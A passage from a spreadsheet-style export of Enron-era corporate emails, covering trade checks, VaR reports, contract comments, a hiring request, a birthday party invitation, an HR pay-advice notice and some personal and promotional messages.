&gt; _x000D_
&gt; Hi.  Hope the ride back to Sacramento went OK last_x000D_
&gt; nite.  It was nice to_x000D_
&gt; see you and catch up. I'm sorry things are so crazy,_x000D_
&gt; but in spite of it_x000D_
&gt; all, your attitude's pretty good.  And your new_x000D_
&gt; suede jacket is gorgeous._x000D_
&gt; _x000D_
&gt; I know your life is very complicated and I don't_x000D_
&gt; want to make it worse, but_x000D_
&gt; if you ever have the time and inclination to go to_x000D_
&gt; lunch, dinner, movie,_x000D_
&gt; whatever, I'd definitely be up for it.  Hang in_x000D_
&gt; there.  Hope to catch up_x000D_
&gt; again soon._x000D_
&gt; _x000D_
&gt; Best,_x000D_
&gt; Jeff_x000D_
&gt; _x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Do You Yahoo!?_x000D_
Get Yahoo! Mail - Free email you can access from anywhere!_x000D_
http://mail.yahoo.com/_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 13 May 1999 09:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>OMLX - URGENT: Susan Gill's details</t>
  </si>
  <si>
    <t xml:space="preserve">Mark_x000D_
_x000D_
Per my voicemail to you, in order to allow the OMLX to install the _x000D_
telecommunications link for the screen etc., they will need at least the last _x000D_
page of the OMNet Agreement signed and sent to them by fax tomorrow.  As soon _x000D_
as Susan sends me the execution copies by e-mail I shall forward them to you._x000D_
_x000D_
However, if you are able to have at least the OMNet Agreement signed by _x000D_
tomorrow, please could you then fax it to:-_x000D_
_x000D_
Susan Gill_x000D_
Lawyer_x000D_
OM London Exchange_x000D_
_x000D_
Tel.:  0171-815-8510_x000D_
_x000D_
Fax:  0171-815-8508_x000D_
_x000D_
Kind regards_x000D_
_x000D_
Mark  </t>
  </si>
  <si>
    <t>Mon, 30 Apr 2001 16:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: willis phillips</t>
  </si>
  <si>
    <t>Along with all the questions that Louise asked, can I please see the resume._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kitchen, Louise  _x000D_
Sent:	Friday, April 27, 2001 10:13 AM_x000D_
To:	Presto, Kevin_x000D_
Cc:	Lavorato, John_x000D_
Subject:	Re: willis phillips_x000D_
_x000D_
This isn't the ex-metals trader from Koch?_x000D_
_x000D_
What level is he?  What is the package - director or below?_x000D_
_x000D_
_x000D_
   _x000D_
_x000D_
 	Enron Capital &amp; Trade Resources Corp.  From:  Kevin M Presto                           04/27/2001 08:49 AM	_x000D_
		_x000D_
_x000D_
_x000D_
_x000D_
To:	John J Lavorato/Enron@EnronXGate, Louise Kitchen/HOU/ECT@ECT_x000D_
cc:	 _x000D_
_x000D_
Subject:	willis phillips_x000D_
_x000D_
We would like to hire Willis Phillips from Koch.   Rogers, Dana, &amp; I have all interviewed him and think he is a can't miss candidate.   The bad news is that he was referred by a headhunter (the fee is 20% of first year package)._x000D_
_x000D_
This guy is quality and I want to make an offer.   Please let me know if I can proceed ASAP._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&lt;Embedded Picture (Device Independent Bitmap)&gt;</t>
  </si>
  <si>
    <t>Fri, 19 Oct 2001 08:29:22 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'pilar.ramirez@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'john.millar@enron.com', 'jan.moore@enron.com', 'vernon.mercaldo@enron.com', 'julie.armstrong@enron.com', 'jim.wiltfong@enron.com', 'kay.threet@enron.com', 'tk.lohman@enron.com', 'michael.bodnar@enron.com', 'audrey.robertson@enron.com', 'kevin.hyatt@enron.com', 'penny.mccarran@enron.com', 'jodie.floyd@enron.com', 'maria.perales@enron.com', 'india.torres@enron.com', 'martha.janousek@enron.com', 'robert.mason@enron.com', 'g..stage@enron.com', 'sean.bolks@enron.com', 'pilar.ramirez@enron.com', 'dana.jones@enron.com', 'reyna.cabrera@enron.com', 'bob.burleson@enron.com', 'kimberly.watson@enron.com', 'preston.roobaert@enron.com', 'stephen.herber@enron.com', 'don.powell@enron.com', 'steve.weller@enron.com', 'lorraine.lindberg@enron.com', 'joan.collins@enron.com', 'linda.wehring@enron.com', 'theresa.branney@enron.com', 'michelle.lokay@enron.com', 'lindy.donoho@enron.com', 'jeanette.doll@enron.com'})</t>
  </si>
  <si>
    <t>RE: ORGANIZER ERROR!  PARTY IS DEFINITELY ON!  Please disregard_x000D_
 Cancellation Notice!</t>
  </si>
  <si>
    <t>Sorry,_x000D_
_x000D_
Please see time and location below.  _x000D_
_x000D_
Date:  Monday, October 22nd._x000D_
_x000D_
Location: 3AC/ 39C1_x000D_
_x000D_
Time:  3:15 p.m._x000D_
_x000D_
P.S.   Morgan did not see this email, even though his name is on the original invite list._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Ramirez, Pilar  _x000D_
Sent:	Friday, October 19, 2001 9:47 AM_x000D_
To:	Bolks, Sean; Branney, Theresa; Burleson, Bob; Cabrera, Reyna; Herber, Stephen; Jones, Dana; Janousek, Martha; Mason, Robert; McCarran, Penny; Mercaldo, Vernon; Powell, Don; Roobaert, Preston; Stage, Michael G.; Threet, Kay; Torres, India; Wehring, Linda; Weller, Steve; Collins, Joan; Wiltfong, Jim; Donoho, Lindy; Lindberg, Lorraine; Lohman, TK; Lokay, Michelle; Moore, Jan; Doll, Jeanette; Robertson, Audrey; Watson, Kimberly; Millar, John; Hyatt, Kevin; Armstrong, Julie; Perales, Maria; Bodnar, Michael; Floyd, Jodie_x000D_
Subject:	FW: ORGANIZER ERROR!  PARTY IS DEFINITELY ON!  Please disregard Cancellation Notice!_x000D_
Importance:	High_x000D_
_x000D_
_x000D_
FYI_x000D_
 -----Original Message-----_x000D_
From: 	Foret, Leigh Ann  _x000D_
Sent:	Friday, October 19, 2001 9:26 AM_x000D_
To:	Buehler, Craig; Neville, Sue; Aschwege, Doug; Reinecke, Bryan; Thomas, Eddie; Dodd, Wilford; Robertson, Audrey; Boatman, Jack; Harris, Steven; Neubauer, Dave; Miller, Kent; Ramirez, Pilar; Hayes, Robert; Salinas, Marian; Cady, Rachel; Farrell, Sharon; Alexander, Betty; Graves, Jerry; Clark, Scott; Hughes, Matt; Matthews, Ron; Lokay, Michelle; Phillips, Mary; Blair, Lynn; Frazier, Perry; Morris, John; Buchanan, John; Kowalke, Terry; DL-ETS Power Services South Weekly Report; Alters, Dennis; Asante, Ben; Bonnstetter, Mike; Carnes, Molly; Cole, Cheryl; Faucheaux, Eric; Foret, Leigh Ann; Gottsponer, Morgan; Hall, Donald; Howell, Dennis; Keller, John R.; Maestas, Gary; McChane, Bob; Ramsaran, Gale; Smith, Buzz; Smith, Roy; Wirasinghe, Errol_x000D_
Subject:	ORGANIZER ERROR!  PARTY IS DEFINITELY ON!  Please disregard Cancellation Notice!_x000D_
Importance:	High_x000D_
_x000D_
QUITE PLEASE!               IT'S A SURPRISE! ! !                     _x000D_
                                                                             _x000D_
Please forward to your group!            &lt;&lt; OLE Object: Picture (Metafile) &gt;&gt; _x000D_
_x000D_
Please join us in celebrating Morgan's 50th Birthday! If possible, wear black Monday.  _x000D_
Gifts are optional of course, but It was suggested that someone bring a cane, walker, denture cream, depends, etc. (you get the picture) "gag gifts" to rub it in a little.  _x000D_
_x000D_
I am new to lots of you, and apologize in advance if I missed anyone.  Please forward this invitation to anyone you think Morgan would like there or who might like to come._x000D_
_x000D_
Thanks, Leigh Ann Foret  (713)853-1966(work)   (713)303-2985(cell)_x000D_
_x000D_
Leigh Ann Foret_x000D_
Sr. Administrative Assistant_x000D_
Enron Transportation Services_x000D_
(713) 853-1966_x000D_
lforet@enron.com</t>
  </si>
  <si>
    <t>Tue, 30 Jan 2001 01:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Deal 93481</t>
  </si>
  <si>
    <t>Daren,_x000D_
_x000D_
I'm looking into this deal.   There is no volume on this deal for January _x000D_
00.     Should this deal have had some volume on it._x000D_
It was never scheduled with volume  however, in January it received flow of _x000D_
3461 due to ranking in POPS.  It was taken to zero once the actuals came in._x000D_
_x000D_
Please let me know if you intended to have volume on this deal for Jan 00  _x000D_
_x000D_
_x000D_
THANKS</t>
  </si>
  <si>
    <t>Thu, 31 Jan 2002 15:49:42 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'litleniles@aol.com'})</t>
  </si>
  <si>
    <t>Re: Hey Buddy!!!</t>
  </si>
  <si>
    <t>HAPPY BIRTHDAY!!! I had no idea! I'm so glad you told me. Hey, I want to send_x000D_
you something that I gathered recently. What is your mailing address--don't_x000D_
worry, it isn't kiddy porn...he he he._x000D_
Listen, have a great day and be safe. I will write a more thorough note_x000D_
tomorrow. I am exhausted...._x000D_
Best to you!_x000D_
Tobin</t>
  </si>
  <si>
    <t>Wed, 30 May 2001 19:18:26 -0700 (PDT)</t>
  </si>
  <si>
    <t>Your May 31 Pay Advice</t>
  </si>
  <si>
    <t>This message is to inform you that information contained on your printed pay advice for the pay period ending May 31, 2001, may be misleading._x000D_
_x000D_
Regardless of whether you have single or multiple direct deposits, your net pay is correct, but your pay advice will indicate that all of your pay has been deposited collectively to "Other Bank".  It does not list specific bank accounts.  However, if you view your pay advice in eHRonline, you will be able to confirm your scheduled direct deposits and verify the accounts to which the deposits were made.  _x000D_
_x000D_
You may access eHRonline and view your pay advice by taking the following steps:_x000D_
_x000D_
?	Click the following link to open eHRonline:  https://ehronline.enron.com _x000D_
?	Read the disclaimer_x000D_
?	Click Accept_x000D_
?	Type your SAP Logon ID (e.g. your "P" ID) in the User Id field._x000D_
?	Enter your SAP password in the Password field._x000D_
?	Click the Logon button._x000D_
?	Select Paycheck Inquiry from the drop-down list_x000D_
?	Click the radio button next to Results in Period to select the default for the May 31, 2001 pay advice_x000D_
?	Click the Continue button._x000D_
?	Click the link for the 05/16/2001-05/31/2001 pay period to display your pay advice._x000D_
?	Scroll to the bottom of the screen to view your direct deposit details._x000D_
_x000D_
If you have additional questions about your pay advice or accessing eHRonline, please contact the ISC Customer Care Group at 713.345.4727 or isc.hotline@enron.com ._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Mon, 5 Mar 2001 05:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>North FINN LLC</t>
  </si>
  <si>
    <t>WYOMING SECRETARY OF STATE, CORPORATE RECORD _x000D_
_x000D_
*** THIS DATA IS FOR INFORMATION PURPOSES ONLY. CERTIFICATION CAN ONLY BE _x000D_
OBTAINED THROUGH THE OFFICE OF THE WYOMING SECRETARY OF STATE *** _x000D_
_x000D_
WYOMING SECRETARY OF STATE, CORPORATE RECORD _x000D_
_x000D_
Name: CBM DRILLING, LLC _x000D_
_x000D_
Mailing Address: NORTH FINN LIMITED LIABILITY COMPANY 950 STAFFORD _x000D_
?????????????????CASPER, WY 82609 _x000D_
_x000D_
Type: LIMITED LIABILITY _x000D_
_x000D_
Status: ACTIVE _x000D_
_x000D_
Filing Date: 4/22/1998 _x000D_
_x000D_
Expiration Date: 4/22/2088 _x000D_
_x000D_
Registered Agent: NORTH FINN LIMITED LIABILITY COMPANY _x000D_
_x000D_
Registered Office: 716 NUGGET (950 STAFFORD - MAILING ADDRESS) _x000D_
???????????????????CASPER, WY 82609 _x000D_
_x000D_
Additional Information: THE LAST ANNUAL REPORT SUBMITTED TO THE STATE WAS _x000D_
????????????????????????FOR 2000 STATE REFERENCE # 25613 _x000D_
_x000D_
Number: 199800333477 _x000D_
_x000D_
History: _x000D_
		_x000D_
DATE	TYPE	COMMENT_x000D_
		_x000D_
12/8/1998	MISCELLANEOUS	AMENDMENT FILED_x000D_
_x000D_
_x000D_
Eric Gillaspie_x000D_
713-345-7667_x000D_
Enron Building 3886</t>
  </si>
  <si>
    <t>Thu, 30 Nov 2000 03:24:00 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: NEW elf bowling!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Bruce Mills/Corp/Enron on 11/30/2000 _x000D_
11:22 AM ---------------------------_x000D_
_x000D_
_x000D_
"Cantu, Veronica" &lt;vcantu@bcm.tmc.edu&gt; on 11/30/2000 11:05:54 AM_x000D_
To: "'Adrian Cantu'" &lt;acantu@hotmail.com&gt;, "'Amy_Copes@Dell.com'" _x000D_
&lt;Amy_Copes@Dell.com&gt;, "'Bruce.Mills@enron.com'" &lt;Bruce.Mills@enron.com&gt;, _x000D_
"'elena morales'" &lt;elena_morales@excite.com&gt;, "'Francisco Sanchez'" _x000D_
&lt;hcdpsecretary@hotmail.com&gt;, "'Gina.Kane@AACN.org'" &lt;Gina.Kane@AACN.org&gt;, _x000D_
"'Kristine Best'" &lt;kristinebest@hotmail.com&gt;, "Liau, Katherine" _x000D_
&lt;Kliau@www.urol.bcm.tmc.edu&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: FW: NEW elf bowling!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Jonietz, Laurie_x000D_
Sent: Thursday, November 30, 2000 10:38 AM_x000D_
To: 'ludmilla'; 'andrea'; Coleman, Angela; Cantu, Veronica; Riezner, Melanie_x000D_
Subject: NEW elf bowling!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!_x000D_
_x000D_
_x000D_
i'm too dumb to figure this version out.  maybe it would help if i read the_x000D_
rules....._x000D_
_x000D_
_x000D_
_x000D_
 - elves2.exe_x000D_
</t>
  </si>
  <si>
    <t>Mon, 7 Aug 2000 12:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>VEPCO PPA</t>
  </si>
  <si>
    <t>Heather / Jeff:_x000D_
_x000D_
Thanks for a copy of the draft PPA. I've addressed this to both of you as _x000D_
some of my questions are based on the interaction of the PPA vs. development _x000D_
timeline and risk. Here are my thoughts / comments:_x000D_
_x000D_
1. The PPA is really a free option through Nov. 30th, at which time we can _x000D_
choose to exercise our position and proceed. How does this fit with our _x000D_
expectations regarding PUC approval of our CPCN (which seems to be our _x000D_
highest risk development item)? Have we gone back and submitted a _x000D_
modification to our CPCN for the 2- LM6000, and 1- SW501D5A config? _x000D_
_x000D_
2. Do we need to define the Facility as "dual" fuel? It will not initially be _x000D_
dual fuelled as we intend to field engineer the dual fuel capability._x000D_
_x000D_
3. Section 3.1 (c). This provision should acknowledge our right to sell base _x000D_
Contract Capacity (as opposed to excess) to any Person to the extent that _x000D_
VEPCO has not exercised their option to purchase such Contract Capacity. In _x000D_
other words, this section should be consistent with sales allowances to other _x000D_
Persons in Section 3.4 (b) (although that section only references energy _x000D_
sales)._x000D_
_x000D_
4. Section 3.4. Can we sell both day ahead energy and capacity to any Person _x000D_
to the extent VEPCO does not exercise their call by providing us the notice _x000D_
contemplated in Section 3.4 (b) (the section only references an allowance for _x000D_
energy sales)?_x000D_
_x000D_
5. Section 3.4(c) Do the "additional costs" which this section requires Buyer _x000D_
to pay (to the extent Buyer provides an intra-day notice) include _x000D_
"lost-profit" costs arising from sales of energy and capacity by Seller to _x000D_
other Persons as permitted in Section 3.4 (b)? If so, I would suggest that _x000D_
this section make a specific reference, such as "including any and all of _x000D_
Seller's lost-profit and transaction costs associated with energy and _x000D_
capacity sales to other Persons"._x000D_
_x000D_
6. Do we have a project LLC formed which can serve as the entity signing the _x000D_
PPA? Do we think VEPCO will ask for any corp. or ENA guarantees to the extent _x000D_
we use an LLC?_x000D_
_x000D_
 7. Have we worked with the accountants to make sure we can use MTM _x000D_
accounting given the terms of this PPA?  _x000D_
_x000D_
Jeff: Please provide a brief development summary to the group outlining (in _x000D_
order of highest risk to lowest) the various significant development items _x000D_
we'll need to deal with for this site (i.e. zoning, groundwater supply vs. _x000D_
municipal water supply, etc.). It would be helpful if you would use the _x000D_
project development control matrix._x000D_
_x000D_
Please let me know if you have any questions._x000D_
_x000D_
Regards,_x000D_
_x000D_
Ben</t>
  </si>
  <si>
    <t>Fri, 15 Feb 2002 09:48:52 -0800 (PST)</t>
  </si>
  <si>
    <t>Assumptions for 2010</t>
  </si>
  <si>
    <t xml:space="preserve">This morning in our meeting, we discussed 3 cases to be run in the TW 2010 model.  I've summarized them in the attached spreadsheet so we can keep track of our variables.  I will be sending you additional info for the various cases.  Please call to discuss._x000D_
_x000D_
Thanks,_x000D_
Lindy_x000D_
36007_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Wed, 16 Aug 2000 03:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>PG&amp;E and EnronOnline</t>
  </si>
  <si>
    <t>Hey Mark:_x000D_
Have we cleared up the remaining issues?  My customer tells me you have the _x000D_
last draft on language. _x000D_
Jennifer</t>
  </si>
  <si>
    <t>Mon, 22 Jan 2001 06:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>www.adventurevillage.com</t>
  </si>
  <si>
    <t>Mon, 14 Jan 2002 18:10:50 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'r-9-56294-4033990-2-3185-us2-55a51a52@xmr3.com'})</t>
  </si>
  <si>
    <t>NEW Refinery Turnarounds Information!</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Colleague:_x000D_
_x000D_
Petroleum Argus has in-depth information for you on refinery maintenance!_x000D_
_x000D_
Petroleum Argus' Refinery Turnarounds service offers the latest information on scheduled and unscheduled maintenance, detailing the unit size and duration of the turnaround - for both domestic and international plants. We also analyze the impact of shutdowns on crude and product prices. _x000D_
_x000D_
How do we get this information?_x000D_
_x000D_
Petroleum Argus has scores of reporters all over the globe - so we get the inside track on these turnarounds well before they are announced. We talk not only to the plant managers, but also to traders and oil company inside sources._x000D_
_x000D_
Petroleum Argus publishes a variety of petroleum industry publications - from the industry standards Weekly Petroleum Argus and Argus Global Markets to Argus LatAm Energy, Argus Crude and Argus Asphalt Report - giving us a thorough understanding of the industry and reliable contacts cultivated from having over 30 years of petroleum industry experience._x000D_
_x000D_
_x000D_
You need this information!_x000D_
_x000D_
_x000D_
   * If you are a trader: You need to know what affect these turnarounds will have on market prices. One turnaround can have a major impact on the market - we give you advanced warning so you can protect yourself. _x000D_
_x000D_
   * If you produce crude or market products: These turnarounds directly affect your margins - you need to know when they occur in order to accurately assess your best supply and demand strategies. _x000D_
_x000D_
   * If you service the industry: This information is vital, giving you the inside track to equipment and service opportunities well before the competition learns of them. _x000D_
_x000D_
   * If you analyze market trends or forecast prices: You must have accurate maintenance data if your forecasts and analysis are to be accurate. _x000D_
REPLY TODAY! _x000D_
_x000D_
To receive more information on this essential service, please email mailto:rlippock@energyargus.com"  or call 202-775-0240 ext 304. _x000D_
_x000D_
FREE TRIALS TO OUR OTHER PRODUCTS! _x000D_
_x000D_
For more information and FREE trials to Petroleum Argus' line of other publications and services, visit our website at http://www.petroleumargus.com _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
If you would rather not receive Argus promotions please follow the instructions below: _x000D_
_x000D_
_x000D_
_x000D_
---------------------------------------------------------------------_x000D_
If you would prefer not to receive further messages from this sender:_x000D_
1. Click on the Reply button._x000D_
2. Replace the Subject field with the word REMOVE._x000D_
3. Click the Send button._x000D_
You will receive one additional e-mail message confirming your removal._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 5 Feb 2001 03:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Looks like Tom forgot this deal on Friday - I've just entered it. Deal # is _x000D_
514006. One thing I didn't check on was whether it was off-peak or on-peak. _x000D_
Does this deal check out with APB? Let me know._x000D_
_x000D_
Thanks,_x000D_
kate_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kerri Thompson@ENRON_x000D_
02/05/2001 07:37 AM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Re: apb checkout  _x000D_
_x000D_
have you found out anything on this trade?_x000D_
_x000D_
thanks_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kerri Thompson_x000D_
02/02/2001 04:48 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Re: apb checkout  _x000D_
_x000D_
she says tom, i guess we can wait until monday....._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   Kate Symes @ ECT                02/02/2001 04:38 PM_x000D_
_x000D_
To: Kerri Thompson/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: apb checkout  _x000D_
_x000D_
I don't see any deals with any of these terms in Tom's trade log for today. _x000D_
He's left the office, and I've left him a message on his cell phone - but _x000D_
until then, I can't really say if this is good or not. Could it be a Mark _x000D_
Fischer deal?_x000D_
_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
Kerri Thompson@ENRON_x000D_
02/02/2001 02:26 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: apb checkout_x000D_
_x000D_
missing deal for tom_x000D_
_x000D_
buy bp energy_x000D_
25 mw_x000D_
217.50_x000D_
march_x000D_
palo verde_x000D_
_x000D_
thanks_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 10 Oct 2001 11:31:41 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'pinto.leite@enron.com', 'marilyn.colbert@enron.com', 'nidia.mendoza@enron.com', 'darren.vanek@enron.com', 'd..hare@enron.com', 'kimberly.allen@enron.com', 'wendy.conwell@enron.com', 'amber.ebow@enron.com', 'sharen.cason@enron.com', 'ann.murphy@enron.com', 'tanya.rohauer@enron.com', 'susan.bailey@enron.com', 'lisa.lees@enron.com', 'peter.keohane@enron.com', 'wendi.lebrocq@enron.com', 'stephanie.sever@enron.com', 'diane.ellstrom@enron.com', 's..theriot@enron.com', 'laurel.adams@enron.com', 'jean.bell@enron.com', 'dianne.seib@enron.com', 'cheryl.nelson@enron.com', 'tom.moran@enron.com', 'edward.sacks@enron.com', 'stephanie.panus@enron.com', 'cheryl.johnson@enron.com', 'l..davis@enron.com', 'n..gray@enron.com', 'carrie.southard@enron.com', 'celeste.cisneros@enron.com', 'mark.greenberg@enron.com', 'legal &lt;.taylor@enron.com&gt;', 'anthony.campos@enron.com', 'adnan.patel@enron.com', 'joe.hunter@enron.com', 'r..brackett@enron.com', 'sara.shackleton@enron.com', 'greg.johnston@enron.com', 'diane.anderson@enron.com', 'bob.bowen@enron.com', 'melinda.whalen@enron.com', 'lesli.campbell@enron.com', 'jason.moore@enron.com', 'melissa.rodriguez@enron.com', 'samuel.schott@enron.com', 'frank.sayre@enron.com', 'bianca.ornelas@enron.com', 'jason.fischer@enron.com', 'marie.heard@enron.com', 'tiffany.williams@enron.com', 's..bradford@enron.com', 'veronica.espinoza@enron.com', 'lynn.shivers@enron.com', 'julie.brewer@enron.com', 'mechelle.stevens@enron.com', 'georgi.landau@enron.com', 'tracy.ngo@enron.com', 'stephanie.piwetz@enron.com', 'rudwell.johnson@enron.com', 'stacey.richardson@enron.com', 'a..garcia@enron.com', 'paul.radous@enron.com', 'leslie.reeves@enron.com', 'samantha.boyd@enron.com', 'credit &lt;.williams@enron.com&gt;', 'mary.cook@enron.com', 'kimberly.hundl@enron.com', 'bernice.rodriguez@enron.com'})</t>
  </si>
  <si>
    <t>El Paso Merchant Energy, L.P. - EOL Financial Transactions</t>
  </si>
  <si>
    <t>We have received an executed side letter agreement dated 08/10/01 with El Paso Merchant Energy, L.P. ("El Paso) which states that "notwithstanding the provisions of the Electronic Trading Agreement or the product descriptions on the EOL website, all financial derivative transactions entered into by El Paso Merchant Energy, L.P. on the Web Site which are listed by either ENA or ECC will be deemed to be entered into between El Paso and ENA and will be governed the the ISDA Master Agreement between El Paso and ENA dated 12/1/99"._x000D_
_x000D_
Copies will be distributed.</t>
  </si>
  <si>
    <t>Wed, 24 Jan 2001 09:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jennifer.nguyen@enron.com', 'georgeanne.hodges@enron.com', 'jan.johnson@enron.com', 'sally.beck@enron.com', 'gary.peng@enron.com', 'cassandra.schultz@enron.com', 'shona.wilson@enron.com'})</t>
  </si>
  <si>
    <t>We are for the most part finished with SEC VaR.  We are missing October and _x000D_
December Brent Crude Commodity Positions.  When we get these numbers we will _x000D_
reissue this report, but they are not likely to be different enough from the _x000D_
guesses we inserted to make a difference. _x000D_
_x000D_
Total VaR is the highest I have seen at $92 million.  _x000D_
_x000D_
One reason is that trading commodities VaR remains very high at $66 million _x000D_
(though it is down from the $81 million of November).  _x000D_
_x000D_
The other reason is that trading securities VaR is by far the highest it has _x000D_
been at $63 million.  Merchant Assets (with a VaR of $29 million) and total _x000D_
return swaps (with a VaR of $56, up from $24 in November) are at all time _x000D_
highs. _x000D_
_x000D_
Bacchus and Riva (both originated in December) conspired to increase total _x000D_
return swap VaR.  Nevertheless, the biggest culprit is Cerberus (a fixed for _x000D_
EOG shares swap we put on in November).  Cerberus contains ten million _x000D_
unhedged shares of EOG.  The value of the shares increased from $42 in _x000D_
November to $55 in December, raising VaR substantially._x000D_
_x000D_
Regards,_x000D_
_x000D_
_x000D_
_x000D_
Eugenio</t>
  </si>
  <si>
    <t>Wed, 6 Dec 2000 23:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: FW: optout language for TVA</t>
  </si>
  <si>
    <t xml:space="preserve">Elizabeth -- Three comments to consider:_x000D_
_x000D_
In the first change, I think that I understand your change, but my impression _x000D_
was that "provided for in this Confirmation" was referring or tieing _x000D_
specifically to the "deal" defined in the Confirmation, therefore the change _x000D_
to say "may be agreed to" seems to weaken that reference._x000D_
_x000D_
On the 10th line, does adding the word "firm" in front of energy potentially _x000D_
conflict with the specific transaction if it is something more or something _x000D_
different than a simple firm deal.  Shouldn't the level of firmness be fully _x000D_
defined elsewhere in the confirm._x000D_
_x000D_
In (b), suggest adding some reference to quantity after your reference to _x000D_
timing along these lines:  " (b)  the starting and ending time and date, and _x000D_
the quantity of the release or interruption;"     Since partial quantity _x000D_
releases are possible/likely, probably even successive releases (due to _x000D_
gradual weather changes)  it would be equally as important to identify _x000D_
quantity and timing.  Example:  start with 200 MW for the month, release 50 _x000D_
MW starting day 10 for balance of month, then another 50 MW over a weekend._x000D_
_x000D_
As always, thanks for your assistance. -- David_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Joseph Wagner@ENRON_x000D_
12/06/2000 02:57 PM_x000D_
To: David Fairley/HOU/ECT@ECT, Kyle Schultz/HOU/ECT@ECT, Rogers _x000D_
Herndon/HOU/ECT@ect_x000D_
cc:  _x000D_
Subject: Re: FW: optout language_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Joseph Wagner/NA/Enron on 12/06/2000 _x000D_
02:55 PM ---------------------------_x000D_
From: Elizabeth Sager@ECT on 12/06/2000 02:53 PM_x000D_
To: Joseph Wagner/NA/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: FW: optout language  _x000D_
_x000D_
Attached is TVA language, to which I made a few changes.  Concept is fine, _x000D_
but before we start using and drop in confirm I will need to see the rest of _x000D_
a draft confirm that we use with TVA._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 10 Jul 2000 17:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>cong</t>
  </si>
  <si>
    <t>release of draft cong management package</t>
  </si>
  <si>
    <t>Tue, 5 Dec 2000 08:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>TW market based rates</t>
  </si>
  <si>
    <t>Can we get together tomorrow to discuss the market based rates issues I _x000D_
raised last week?_x000D_
If you can do it tomorrow, let me know what times you are not available and _x000D_
I'll schedule something around them.  Thanks.</t>
  </si>
  <si>
    <t>Wed, 27 Dec 2000 02:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Colder than shit on Fri-Sun.  Nice tomorrow.  I'm getting the urge to play _x000D_
hooky.  DF</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 05:31:33 -0800 (PST)</t>
  </si>
  <si>
    <t>TRV Notification:  (West VaR - 11/21/2001)</t>
  </si>
  <si>
    <t>The report named: West VaR &lt;http://trv.corp.enron.com/linkFromExcel.asp?report_cd=36&amp;report_name=West+VaR&amp;category_cd=2&amp;category_name=WEST&amp;toc_hide=1&amp;sTV1=2&amp;TV1Exp=Y&amp;current_efct_date=11/21/2001&gt;, published as of 11/21/2001 is now available for viewing on the website.</t>
  </si>
  <si>
    <t>Mon, 25 Sep 2000 07:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Oklahoma Trip</t>
  </si>
  <si>
    <t xml:space="preserve">Certainly understand the tradition you have with OU/Texas and it would be_x000D_
hard. I imagine David is starting to feel a little cocky, given we should be_x000D_
undefeated going into Texas, but he may still need to seek the shelter of_x000D_
the study, as I know Texas is not going to roll over and play dead._x000D_
_x000D_
Sounds like Meagan has a full agenda this Fall and a trip to Norman would_x000D_
only get in the way. I'm sure David will not let the fire die, if she is_x000D_
truly interested in OU. FYI, OU's Spring Break is March 17-25 next year. So_x000D_
you can plan accordingly. Let me know if you decide when you decide to come_x000D_
up and I can get you lined up with Prospective Student Services for a tour._x000D_
Also, I remember you telling me about your concerns about grades. I know_x000D_
that OU requires a 24 on the ACT, or finish in the top 1/3 of your_x000D_
graduating class. It is my understanding that will soon be increasing to 26_x000D_
or top 30% of graduating class. Looks like OU is following UT on tightening_x000D_
entrance requirements._x000D_
_x000D_
I can get you shirts caps, sweatshirts, etc. for OU, UT and Tech. You can go_x000D_
